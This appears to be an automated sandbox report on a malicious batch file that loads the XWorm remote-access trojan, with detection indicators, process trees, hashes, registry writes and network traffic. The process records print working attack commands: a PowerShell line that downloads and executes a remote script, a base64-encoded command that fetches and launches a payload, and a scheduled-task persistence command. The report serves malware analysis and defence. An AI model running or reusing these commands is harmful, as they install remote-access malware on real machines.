File name:

testing.bat

Full analysis: https://app.any.run/tasks/613ebee0-5a6f-49bb-93df-03e49362848a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2025, 17:57:43
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
evasion
github
xworm
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

022ADBDA047D8F454EE928102A0EC805

SHA1:

6A552A962A63965FC01F7BD04B6D42D84584E7A4

SHA256:

908BE8B24A3A4F0F6ACEBA2AD41E20AD8446BF29227C203AE8320D391EBEAFDC

SSDEEP:

3:VSJJFHPFD9WLW3BZWZnF:s7CLWx8F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2136)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 2136)
      • mason6bkkjz.bat (PID: 7884)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7440)
      • powershell.exe (PID: 8060)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8060)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 8060)
    • Uses Task Scheduler to run other applications

      • mason6bkkjz.bat (PID: 7884)
    • XWORM has been detected (YARA)

      • mason6bkkjz.bat (PID: 7884)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2852)
      • powershell.exe (PID: 2136)
      • mason6bkkjz.bat (PID: 7884)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 2852)
      • powershell.exe (PID: 2136)
    • Application launched itself

      • powershell.exe (PID: 2136)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 2136)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 2136)
      • mason6bkkjz.bat (PID: 7884)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7440)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7440)
    • Starts application with an unusual extension

      • powershell.exe (PID: 7440)
    • Reads security settings of Internet Explorer

      • mason6bkkjz.bat (PID: 7884)
    • Reads the date of Windows installation

      • mason6bkkjz.bat (PID: 7884)
    • Probably download files using WebClient

      • mason6bkkjz.bat (PID: 7884)
    • Starts process via Powershell

      • powershell.exe (PID: 8060)
    • Manipulates environment variables

      • powershell.exe (PID: 8060)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • mason6bkkjz.bat (PID: 7884)
    • There is functionality for taking screenshot (YARA)

      • mason6bkkjz.bat (PID: 7884)
    • Connects to unusual port

      • mason6bkkjz.bat (PID: 7884)
    • Suspicious files were dropped or overwritten

      • powershell.exe (PID: 7440)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 7440)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 2136)
      • powershell.exe (PID: 7440)
      • mason6bkkjz.bat (PID: 7884)
      • powershell.exe (PID: 8060)
    • Checks proxy server information

      • powershell.exe (PID: 2136)
      • powershell.exe (PID: 7440)
      • mason6bkkjz.bat (PID: 7884)
      • powershell.exe (PID: 8060)
    • Checks supported languages

      • mason6bkkjz.bat (PID: 7884)
    • The executable file from the user directory is run by the Powershell process

      • mason6bkkjz.bat (PID: 7884)
    • Reads the computer name

      • mason6bkkjz.bat (PID: 7884)
    • Reads the machine GUID from the registry

      • mason6bkkjz.bat (PID: 7884)
    • Reads Environment values

      • mason6bkkjz.bat (PID: 7884)
    • Process checks computer location settings

      • mason6bkkjz.bat (PID: 7884)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8060)
    • Reads the software policy settings

      • mason6bkkjz.bat (PID: 7884)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(7884) mason6bkkjz.bat
C2127.0.0.1:1417
Keys
AESMasonRAT
Options
SplitterMasonGroup
USB drop nameUSB.exe
MutexN7qobpPmRBqBdt1q
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
12
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe sppextcomobj.exe no specs slui.exe no specs powershell.exe #XWORM mason6bkkjz.bat powershell.exe conhost.exe no specs schtasks.exe no specs conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2136powershell "irm files.catbox.moe/uazui0.bat | iex"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2852C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\testing.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4652\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5680\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6028"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "mason6bkkjz" /tr "C:\Users\admin\AppData\Roaming\mason6bkkjz.bat"C:\Windows\System32\schtasks.exemason6bkkjz.bat
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7220C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7252"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7440"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('CiRiYXNlNjQgPSAoaXdyIC1VcmkgJ2h0dHBzOi8vZmlsZXMuY2F0Ym94Lm1vZS9uYWcxZTEudHh0JykuQ29udGVudAokYnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRiYXNlNjQpCiRwYXRoID0gW1N5c3RlbS5JTy5QYXRoXTo6Q29tYmluZSgkZW52OkFQUERBVEEsICdtYXNvbjZia2tqei5iYXQnKQpbU3lzdGVtLklPLkZpbGVdOjpXcml0ZUFsbEJ5dGVzKCRwYXRoLCAkYnl0ZXMpClN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwYXRoCg==')) | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7884"C:\Users\admin\AppData\Roaming\mason6bkkjz.bat" C:\Users\admin\AppData\Roaming\mason6bkkjz.bat
powershell.exe
User:
admin
Company:
%Company%
Integrity Level:
MEDIUM
Description:
%Title%
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\mason6bkkjz.bat
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
XWorm
(PID) Process(7884) mason6bkkjz.bat
C2127.0.0.1:1417
Keys
AESMasonRAT
Options
SplitterMasonGroup
USB drop nameUSB.exe
MutexN7qobpPmRBqBdt1q
Total events
18 313
Read events
18 299
Write events
14
Delete events
0

Modification events

(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7884) mason6bkkjz.batKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mason6bkkjz_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
1
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
7440powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:12F68428A5BAD1958F8244A43AAC4056
SHA256:743693FFCF340BAA9C26247F09D92B1D14E0942BF78327D619B006095C1A0171
2136powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ocfnahvh.fie.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2136powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dambg0kd.nhj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fbptrtwc.q1y.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wrza1w1u.uld.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7440powershell.exeC:\Users\admin\AppData\Roaming\mason6bkkjz.batexecutable
MD5:84BFE8724453FF2F1CD26F90566DE24B
SHA256:AFF329803782E92F38374DEA9B17817B7DA9C246D486603C7BDAA538952E809F
8060powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jx5h21wp.tyi.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8060powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zx13uaum.r5g.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
26
DNS requests
17
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2136
powershell.exe
GET
301
108.181.20.35:80
http://files.catbox.moe/uazui0.bat
unknown
malicious
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2236
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
2236
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7884
mason6bkkjz.bat
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2136
powershell.exe
108.181.20.35:80
files.catbox.moe
TELUS Communications
CA
malicious
2136
powershell.exe
108.181.20.35:443
files.catbox.moe
TELUS Communications
CA
malicious
2112
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7440
powershell.exe
108.181.20.35:443
files.catbox.moe
TELUS Communications
CA
malicious

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.176
  • 23.48.23.189
  • 23.48.23.190
  • 23.48.23.175
  • 23.48.23.161
  • 23.48.23.169
  • 23.48.23.191
  • 23.48.23.181
  • 23.48.23.184
whitelisted
google.com
  • 142.250.185.174
whitelisted
files.catbox.moe
  • 108.181.20.35
malicious
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.159.0
  • 20.190.159.130
  • 20.190.159.2
  • 20.190.159.73
  • 40.126.31.128
  • 40.126.31.129
  • 40.126.31.3
  • 20.190.159.75
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
ip-api.com
  • 208.95.112.1
whitelisted
github.com
  • 140.82.121.4
whitelisted
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.110.133
  • 185.199.108.133
  • 185.199.109.133
whitelisted

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Potentially Bad Traffic
ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
Potentially Bad Traffic
ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
No debug info